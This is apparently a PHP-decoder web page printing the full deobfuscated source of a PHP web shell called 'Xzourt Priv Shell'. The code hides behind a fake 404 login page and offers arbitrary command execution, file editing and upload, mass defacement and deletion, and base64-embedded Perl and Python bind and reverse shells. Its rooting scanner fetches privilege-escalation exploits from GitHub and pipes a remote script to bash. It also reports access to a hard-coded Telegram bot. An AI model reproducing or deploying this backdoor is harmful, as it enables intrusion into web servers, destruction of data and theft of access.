Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? goto xIYwS; heAIF: @ini_set("display_errors", 0); goto qLV0I; JpEYZ: $disfunc = ..
Decoded Output download
<?
goto xIYwS; heAIF: @ini_set("display_errors", 0); goto qLV0I; JpEYZ: $disfunc = @ini_get("disable_functions"); goto gUvZY; sYXiW: if (isset($_7["filenew"])) { s(); if (isset($_7["bikin"])) { $name = $_7["name_file"]; $contents_file = $_7["contents_file"]; foreach ($name as $name_file) { $handle = @fopen("{$name_file}", "w"); if ($contents_file) { $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if ($create) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "\xa\x9 <div class='mb-3'>
\x9 <form method='POST'>\xa \x9\x9 <i class='bi bi-file-earmark'></i> Filename:\xa \x9\x9 <input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' {$_r}>\xa \x9\x9\x9<i class='bi bi-file-earmark'></i> Your script:
\x9 \x9\x9<textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' {$_r}></textarea>
<div class='d-grid gap-2'>
\x9\x9\x9\x9\x9<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>
\x9 </div>
\x9\x9 </form>
</div>"; } goto cBTCn; EI0T7: if (isset($_7["r_f"])) { $old = $file; $new = $_7["new_name"]; rename($new, $old); if (file_exists($new)) { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">\xa\x9 <strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa \x9</div>"; } else { if (rename($old, $new)) { echo "<strong>Rename file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Rename file</strong> fail! " . er() . "</div>"; } } } goto wpPmE; a2ryI: if ($telegram == "on") { $send = array("chat_id" => $chatId, "text" => $xtx); $web_telegram = "https://api.telegram.org/{$botUrl}"; $ch = curl_init($web_telegram . "/sendMessage"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $send); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } goto U8rFL; PjodP: $chatId = "1612424585"; goto XPEKY; i4QHr: $pl = exe("perl --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto McQhW; dVZti: function Login() { ?>
<html><head><body><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><style>input{margin:0;background-color:#fff;border:1px solid #fff}</style><pre align="center"><form method="post"><input name="p"type="password"></form></pre></body></html><?php die; } goto mpJld; lZheg: if ($_7["action"] == "rename_folder") { if ($_7["r_d"]) { $r_d = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_7["r_d"]) . ''); if ($r_d) { echo "<strong>Rename folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Rename folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } s(); echo "\xa\x9 <div class='btn-group'>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9 </div>\xa\x9\x9<br>\xa \x9\x9<i class='bi bi-folder-fill'></i>: " . basename($dir) . "\xa </br>
\x9 <form method='POST'>
\x9\x9\x9<div class='input-group'>\xa \x9\x9<input class='form-control btn-sm' type='text' value='" . basename($dir) . "' name='r_d' {$_r}>
\x9\x9<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>\xa\x9 </form>"; } goto EI0T7; N3tWO: $paths = explode("/", $path); goto jZCJP; xc3qc: echo "\xa<html>
<head>\xa\x9 <meta charset='UTF-8'>\xa \x9<meta name='author' content='UnknownSec'>\xa \x9<meta name='viewport' content='width=device-width, initial-scale=0.70'>
\x9\x9<link rel='stylesheet' href='//xnxx.co.ws/meki.css'>
\x9<link rel='icon' href='//xnxx.co.ws/anya.jpg'>
\x9\x9<title>{ Xzourt Priv Shell }</title>\xa\x9\x9<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
\x9 <script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\xa\x9 <script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\xa\x9</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
\x9<div class='box shadow bg-dark p-4 rounded-3'>
\x9 \x9<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h4>404 Priv Shell</h4></a>"; goto Hzffk; XPEKY: $botUrl = "bot5826555844:AAHn6k0eF4OADoMj1Jx1WAGAtT9XlDeLsDE"; goto OcHn3; wB9pF: if ($_7["action"] == "edit") { s(); echo "
\x9\x9<div class='btn-group'>
\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>
\x9\x9</div>
\x9 <br>
\x9\x9\x9<i class='bi bi-file-earmark'></i>: " . basename($file) . "
\x9</br>\xa\x9\x9<form method='POST'>\xa \x9<textarea class='form-control btn-sm' rows='10' name='contents' {$_r}>" . htmlspecialchars(file_get_contents($file)) . "</textarea>\xa \x9\x9<div class='d-grid gap-2'>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>
</form>"; } goto lZheg; Lw2_l: set_time_limit(0); goto avrpj; l_7Kw: $dir = str_replace("\", "/", $dir); goto UtA_L; gczsm: @ini_set("output_buffering", 0); goto heAIF; YMRzT: function exe_root($set, $sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $set)) { $set = $set . " " . $xx; } $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink, $sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } goto RkY6o; BZcMI: $gcw = "getcwd"; goto idnUM; o8bBX: if (isset($_GET["dir"]) && $_GET["id"] == "scan_root") { ob_implicit_flush(); ob_end_flush(); s(); echo "\xa\x9\x9 <div class='text-center'>
\x9\x9\x9\x9<div class='btn-group mb-3'>\xa\x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a>\xa\x9 \x9\x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a>
\x9 \x9 <a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a>
\x9\x9 </div>\xa \x9</div>"; if (!function_exists("proc_open")) { echo "<center class='anu'>Command is Disabled !</center>"; } if (!is_writable($path)) { echo "<center class='anu'>Current Directory is Unwriteable !</center>"; } if (isset($_GET["id_two"]) && $_GET["id_two"] == "autoscan") { if (!file_exists($path . "/rooting/")) { mkdir($path . "/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path . "/rooting"); exe_root("tar -xf auto.tar.gz", $path . "/rooting"); if (!file_exists($path . "/rooting/netfilter")) { die("<center class='anu'>Failed to Download Material !</center>"); } } echo "
\x9\x9\x9 <div class="container-fluid language-javascript">\xa \x9 <div class="shell mb-3">
\x9\x9 \x9 <pre style="font-size:10px;"><code>Netfilter : " . exe_root("timeout 10 ./rooting/netfilter", $path) . "Ptrace : " . exe_root("echo id | timeout 10 ./rooting/ptrace", $path) . "Sequoia : " . exe_root("timeout 10 ./rooting/sequoia", $path) . "OverlayFS : " . exe_root("echo id | timeout 10 ./overlayfs", $path . "/rooting") . "Dirtypipe : " . exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path) . "Sudo : " . exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path) . "Pwnkit : " . exe_root("echo id | timeout 10 ./pwnkit", $path . "/rooting") . '' . exe_root("rm -rf rooting", $path) . "</code></pre>\xa\x9 \x9\x9\x9</div>\xa \x9\x9\x9</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "scansd") { echo "<center class="anu">[+] Scanning ...</center>"; echo "
\x9\x9\x9<div class="container-fluid language-javascript">
\x9 \x9\x9 <div class="shell mb-3">
\x9\x9\x9\x9 \x9<pre style="font-size:10px;"><code>" . exe_root("find / -perm -u=s -type f 2>/dev/null", $path) . "</code></pre>
\x9 \x9\x9 </div>\xa \x9 \x9</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "esg") { echo "<center class="anu">[+] Loading ...</center>"; echo "\xa\x9\x9\x9 <div class="container-fluid language-javascript">
\x9 \x9 \x9<div class="shell mb-3">
\x9 <pre style="font-size:10px;"><code>" . exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path) . "</code></pre>\xa \x9 </div>\xa\x9\x9 </div>"; } } goto E1CyH; cmezN: mail($to, "XZOURT WEBSHELL COMPANY", $pesan_alert, "[ " . php_uname() . " ]"); goto wULVu; ItSPn: error_reporting(0); goto GGQ1Y; Ao2uT: @ini_set("log_errors", 0); goto mVBqX; Hzffk: if (isset($_7["path"])) { $path = $_7["path"]; chdir($path); } else { $path = $gcw(); } goto KYKN5; UPxMA: function sz($byt) { $typ = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $byt >= 1024 && $i < count($typ) - 1; $byt /= 1024, $i++) { } return round($byt, 2) . " " . $typ[$i]; } goto ajmYY; d03Rs: function s() { echo "<style>table{display:none;}</style><div class="table-responsive"><hr></div>"; } goto o8GGc; KHzp9: if (isset($_7["edit_file"])) { $updt = fopen("{$file}", "w"); $result = fwrite($updt, $_7["contents"]); if ($result) { echo "<strong>Edit file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Edit file</strong> fail! " . er() . "</div>"; } } goto wB9pF; laih7: $scand = scandir($path); goto skUzm; o8GGc: function ok() { echo "<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto PUide; fEjCS: $data = "< < \xf0\235\x90\221\xf0\235\x90\x84\360\x9d\x90\x92\360\235\x90\x94\xf0\235\x90\213\xf0\x9d\220\223 \360\x9d\220\x96\360\235\220\x84\360\235\x90\x81\360\235\x90\x92\360\x9d\x90\x87\360\x9d\220\204\360\235\x90\213\xf0\x9d\x90\213 > >\360\237\x94\220
\xaAkses: {$x_path} \xa"; goto H2vUy; Aif8H: @ini_set("output_buffering", 0); goto f20ej; jZCJP: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=/'>/</a>"; continue; } if ($pat == '') { continue; } echo "<a class='text-decoration-none' href='?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "'>" . $pat . "</a>/"; } goto laih7; uJh3k: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto YMRzT; VVBQf: set_time_limit(0); goto ItSPn; cBTCn: if (isset($_7["dirnew"])) { s(); if (isset($_7["create"])) { $name = $_7["name_dir"]; foreach ($name as $name_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir); $fd = @mkdir($folder); } if ($fd) { echo "<script>window.location='?path={$path}'</script>"; } else { echo "<strong>Create dir</strong> fail! " . er() . "</div>"; } } echo "
<div class='mb-3'>\xa \x9 <form method='POST'>\xa \x9\x9<i class='bi bi-folder'></i> Name directory:\xa \x9\x9<div class='input-group mb-3'>
\x9\x9\x9 \x9<input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' {$_r}>
\x9\x9 <input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'>
\x9 </div>
\x9 </form>
\x9 </div>"; } goto jK5Gg; LAdCu: $curl = function_exists("curl_version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto taJBV; E1CyH: if (isset($_7["opn"])) { $file = $_7["opn"]; } goto wciV1; KYKN5: $path = str_replace("\", "/", $path); goto N3tWO; UtA_L: $scdir = explode("/", $dir); goto tFC8Q; mpJld: if (!isset($_SESSION[base64_encode($_SERVER["HTTP_HOST"])])) { if (empty($inipass) || isset($_7["p"]) && base64_encode($_7["p"]) == $inipass) { $_SESSION[base64_encode($_SERVER["HTTP_HOST"])] = true; } else { Login(); } } goto XzF7p; binbg: $_7 = array_merge($_POST, $_GET); goto vbV3q; tFC8Q: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if ($_7["id"] == "deface") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; file_put_contents($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { file_put_contents($, $contents_sc); } elseif ($dirb === "..") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$dirb}/{$namefile}<br>"; file_put_contents($, $contents_sc); } } } } } } if ($_7["start"]) { if ($_7["tipe"] == "mass") { mass_all($_7["d_dir"], $_7["d_file"], $_7["script"]); } elseif ($_7["tipe"] == "onedir") { mass_onedir($_7["d_dir"], $_7["d_file"], $_7["script"]); } } s(); echo "
\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9 <form method='POST'> Tipe:\xa\x9 \x9<div class='form-check'>\xa\x9\x9\x9\x9<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>\xa \x9 <label class='form-check-label' for='flexCheckDefault'>One dir</label>\xa \x9\x9</div>
\x9 <div class='form-check'>\xa \x9\x9 <input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>All directory</label>
\x9 \x9</div>\xa \x9 <i class='bi bi-folder'></i> Directory:\xa <input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\xa \x9\x9\x9<i class='bi bi-file-earmark'></i> Filename:
\x9 \x9<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename'>\xa\x9\x9\x9 <i class='bi bi-file-earmark'></i> Your script:\xa \x9<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script'></textarea>
\x9 \x9<div class='d-grid gap-2'>\xa \x9 <input class='btn btn-dark btn-sm' type='submit' name='start' value='deface'>
\x9\x9 </div>
\x9 </form>\xa\x9 </div>"; } if ($_7["id"] == "delete") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { if (file_exists("{$dir}/{$namefile}")) { unlink("{$dir}/{$namefile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namefile}")) { unlink('' . dirname($dir) . "/{$namefile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; unlink($); $ = mass_delete($dirc, $namefile); } } } } } } } if ($_7["start"]) { mass_delete($_7["d_dir"], $_7["d_file"]); } s(); echo "
\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9 \x9<form method='POST'>\xa \x9\x9\x9<i class='bi bi-folder'></i> Directory:
\x9\x9\x9\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}>\xa \x9 <i class='bi bi-file-earmark'></i> Filename:
\x9 \x9 <div class='input-group'>
\x9 <input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' {$_r}><br>
\x9<div class='input-group-append'>
\x9 <input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'>
\x9\x9\x9\x9 </div>
\x9\x9\x9\x9</div>\xa\x9 \x9</form>\xa\x9 </div>"; } if ($_7["id"] == "phpinfo") { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $front = strpos($buff, "<body>") + 6; $end = strpos($buff, "</body>"); echo "<pre class='php_info'>" . substr($buff, $front, $front - $front) . "</pre>"; die; } if ($_7["id"] == "network") { s(); echo "
\x9 <div class='card text-dark'>
\x9\x9<div class='card-header'>
<form method='post'>
\x9\x9 \x9 <u>Bind port to /bin/sh [Perl]</u><br>
\x9\x9\x9<u>Port :</u>
\x9 \x9 <div class='input-group'>
\x9 <input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
\x9 \x9 \x9<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'>\xa\x9 </div>
\x9\x9<h5>Back-Connect</h5>\xa \x9\x9<u>Server :</u>
\x9\x9<input class='form-control btn-sm' type='text' name='server' placeholder='" . $_SERVER["REMOTE_ADDR"] . "'>\xa\x9 \x9<u>Port :</u>\xa\x9\x9\x9<div class='input-group'>
\x9\x9 <input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
\x9 \x9<select class='form-control btn-sm' name='bc'>\xa\x9\x9\x9 <option value='perl'>perl</option>
\x9\x9\x9\x9 <option value='python'>python</option>
\x9\x9 \x9</select>
\x9\x9</div>\xa\x9 <div class='d-grid gap-2'>
\x9\x9\x9\x9<input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'>\xa\x9 </div>\xa\x9\x9</form>"; if ($_7["bpl"]) { $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen("bp.pl", "w"); fwrite($brt, $bp); $out = exe("perl bp.pl " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}\xa" . exe("ps aux | grep bp.pl") . "</pre>"; unlink("bp.pl"); } if ($_7["bc"] == "perl") { $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen("bc.pl", "w"); fwrite($plbc, $bc); $out = exe("perl bc.pl " . $_7["server"] . " " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}
" . exe("ps aux | grep bc.pl") . "</pre>"; unlink("bc.pl"); } if ($_7["bc"] == "python") { $bc_py = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen("bcpy.py", "w"); fwrite($pbc_py, $bc_py); $out_py = exe("python bcpy.py " . $_7["server"] . " " . $_7["port"]); sleep(1); echo "<pre>{$out_py}\xa" . exe("ps aux | grep bcpy.py") . "</pre>"; unlink("bcpy.py"); } echo "</div>\xa\x9 </div>\xa \x9<br/>"; } if ($_7["id"] == "cmd") { s(); if (!empty($_POST["cmd"])) { $cmd = shell_exec($_POST["cmd"] . " 2>&1"); } echo "\xa\x9 <div class='mb-3'>\xa\x9\x9 <form method='POST'>
\x9 <div class='input-group mb-3'>\xa \x9 <input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa <button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>
\x9 </form>"; if ($cmd) { echo "\xa\x9\x9\x9<div class="container-fluid language-javascript">
<div class="shell mb-3">
\x9\x9 \x9 <pre style="font-size:10px;"><gr>~</gr>$ <rd>" . htmlspecialchars($_POST["cmd"]) . "</rd><br><code>" . htmlspecialchars($cmd, ENT_QUOTES, "UTF-8") . "</code></pre>\xa\x9 \x9 </div>
\x9 </div>"; } elseif (!$cmd && $_SERVER["REQUEST_METHOD"] == "POST") { echo "\xa\x9\x9\x9<div class="container-fluid language-javascript">\xa \x9\x9\x9<div class="shell mb-3">\xa \x9 \x9<pre style="font-size:10px;"><code>No result</code></pre>
\x9 \x9\x9</div>\xa\x9\x9\x9</div>
\x9 </div>"; } } if ($_7["id"] == "upload") { s(); if (isset($_7["upl"])) { $result = count($_FILES["file"]["name"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["file"]["name"][$contents]; $up = @copy($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); } if ($result < 2) { if ($up) { echo "<strong>Upload</strong> {$namefile} ok! " . ok() . "</div>"; } else { echo "<strong>Upload</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Upload</strong> {$result} ok! " . ok() . "</div>"; } } echo "\xa\x9 <div class='card card-body text-dark input-group mb-3'>\xa <u>Multiple upload</u>\xa\x9 \x9<form method='POST' enctype='multipart/form-data'>\xa\x9\x9\x9 <div class='input-group'>
\x9 \x9\x9 <input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>
\x9\x9 \x9<input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'>\xa\x9 \x9\x9</div>
\x9 </form>
\x9</div>"; } } goto o8bBX; n4wge: foreach ($scand as $file) { $ft = date("Y-m-d G:i", filemtime("{$path}/{$file}")); if (function_exists("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if (function_exists("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } if (!is_file($path . "/" . $file)) { continue; } if (strlen($file) > 25) { $_f = substr($file, 0, 25) . "...-." . $ext; } else { $_f = $file; } echo "\xa \x9<tr>
\x9<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir={$path}&action=view&opn={$file}'>{$_f}</a></td>
\x9\x9\x9<td class='text-center'>file</td>
\x9\x9\x9<td class='text-center'>{$ft}</td>\xa <td class='text-center'>" . sz(filesize($file)) . "</td>\xa\x9\x9 <td class='text-center'>{$fowner}<gr>/</gr>{$fgrp}</td>
\x9\x9 <td class='text-center'>"; if (is_writable($path . "/" . $file)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $file)) { echo "<rd>"; } echo p($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</gr></rd></td>"; } echo "
\x9 <td class='text-center'>
\x9 <div class='btn-group'>\xa \x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>\xa\x9 \x9</div>
\x9</td>
</tr>"; } goto Aif8H; qLV0I: date_default_timezone_set("Asia/Jakarta"); goto binbg; skUzm: echo " [ " . w($path, p($path)) . " ]"; goto octvi; jK5Gg: echo "\xa\x9\x9<div class="table-responsive">\xa\x9 <table class="table table-hover table-dark text-light">
<thead>
\x9\x9<tr>
\x9\x9<td class="text-center">name</td>
\x9\x9\x9 <td class="text-center">type</td>
<td class="text-center">last edit</td>\xa\x9\x9\x9 <td class="text-center">size</td>
\x9 <td class="text-center">owner<gr>/</gr>group</td>\xa\x9 \x9<td class="text-center">permsion</td>
